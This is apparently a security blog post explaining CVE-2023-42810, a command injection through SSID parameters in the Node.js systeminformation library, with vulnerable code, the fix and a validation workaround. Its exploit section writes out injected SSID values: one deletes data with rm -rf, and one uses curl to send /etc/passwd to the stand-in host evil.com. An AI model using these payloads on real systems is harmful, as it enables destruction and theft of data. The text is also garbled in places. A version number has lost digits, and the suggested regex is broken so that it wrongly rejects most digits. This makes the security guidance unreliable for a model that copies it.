CVE-2023-42810 - How a Command Injection in systeminformation Exposed Node.js Apps to SSID Attacks

CVE-2023-42810 highlights a critical command injection vulnerability in the popular Node.js library, systeminformation, that could allow attackers to execute arbitrary commands through SSID parameters. If you use systeminformation to gather WiFi data in your Node apps and do not properly sanitize inputs, your server could be at risk.

This post covers what happened, who’s at risk, how the exploit works, how it was fixed, and suggestions to secure your apps.

Background: What is systeminformation?

systeminformation is a handy Node.js library providing detailed system statistics and hardware information. It’s widely adopted, boasting over 10 million downloads per month. Its functions can query CPU, memory, disk, battery, WiFi networks, and more from various operating systems.

wifiNetworks(): Lists all available WiFi networks.

These functions ask the underlying OS for info, and sometimes pass user-supplied parameters to command-line tools.

What is CVE-2023-42810?

CVE-2023-42810 NVD entry describes a command injection vulnerability affecting versions 5.. through 5.21.6 of systeminformation. Specifically, if a user-provided string (such as an SSID) was passed to wifiConnections() or wifiNetworks(), an attacker could inject shell commands, potentially gaining access, changing configurations, or running malicious code on the server.

Why does this happen?

Older versions of systeminformation did not verify or sanitize the SSID strings before passing them to underlying OS commands. If the SSID value included malicious shell code, it got directly executed.

For example, imagine

const si = require('systeminformation');

const ssid = userInput; // Maybe from a web form
si.wifiConnections(ssid).then(res => {
  console.log(res);
});

If userInput is a string such as

mySSID; rm -rf /important-data

This would result in the command execution of rm -rf /important-data on your server!

Exploit Details

Let’s dive a little deeper into how attackers could leverage this flaw.

Suppose an app lets users list WiFi networks by giving an SSID filter. If the app code looks like

const si = require('systeminformation');

app.post('/checkwifi', (req, res) => {
  const ssid = req.body.ssid; // User supplies SSID
  si.wifiNetworks(ssid)
    .then(networks => res.json(networks))
    .catch(err => res.status(500).send(err));
});

An attacker sets

ssid = mynetwork; curl http://evil.com/$(cat /etc/passwd)

Under the hood, systeminformation might build a command like

iwlist wlan scan essid mynetwork; curl http://evil.com/$(cat /etc/passwd)

The shell runs both the intended command and the attacker’s curl call, leaking sensitive server data.

> Even if your app doesn’t *seem* to let users pass SSID strings, any third-party code using systeminformation could be at risk if they take unsanitized input.

Fix: How It Was Resolved

The fix was introduced in version 5.21.7, which added stricter input validation. Now, non-string or suspicious parameter values are rejected, blocking any injected shell code.

Patch PR #859 shows the new parameter checks.

Key change

// Before: No sanitization
execSync(iwlist... essid ${ssid});

// After: Basic sanitization
if (typeof ssid === 'string' && /^[a-zA-Z-9_.-]+$/.test(ssid)) {
  execSync(iwlist... essid "${ssid}");
} else {
  throw new Error('Invalid SSID');
}

Now, only alphanumeric, underscore, dot, and hyphen SSIDs (the usual set) are accepted.

Workarounds: Secure Your Code — Even Without Updating

Upgrade as soon as possible to systeminformation 5.21.7 or later! If you’re unable to upgrade immediately, always sanitize and validate input passed to these functions.

Sanitize Example

function secureSSID(ssid) {
  // Only allow alphanumeric and common WiFi SSID chars
  return typeof ssid === 'string' && /^[a-zA-Z-9_.-]+$/.test(ssid);
}

// Usage
if (secureSSID(userSSID)) {
  si.wifiNetworks(userSSID)
    .then(res => { ... });
} else {
  // Reject
  res.status(400).send('Invalid SSID');
}

> Never trust user input — check/clean every string, especially those destined for a system command.
>
> Be cautious of third-party dependencies and modules that take parameters to systeminformation.

References

- CVE-2023-42810 on NVD
- systeminformation Issue #879
- systeminformation Release 5.21.7
- systeminformation Source
- PR #859: Fix Parameter Checks

Conclusion

CVE-2023-42810 is a wake-up call: even trusted libraries can have simple, devastating bugs if inputs are not sanitized. If you use systeminformation below 5.21.7 and ever pass user-sourced SSID strings to wifiConnections() or wifiNetworks(), upgrade and add strong input checking immediately.

Stay safe:

Audit code paths that touch the shell

If you want more details or need help patching your environment, check the official GitHub links or reach out to experienced Node.js security professionals.

Timeline

Published on: 09/21/2023 18:15:12 UTC
Last modified on: 09/23/2023 03:38:14 UTC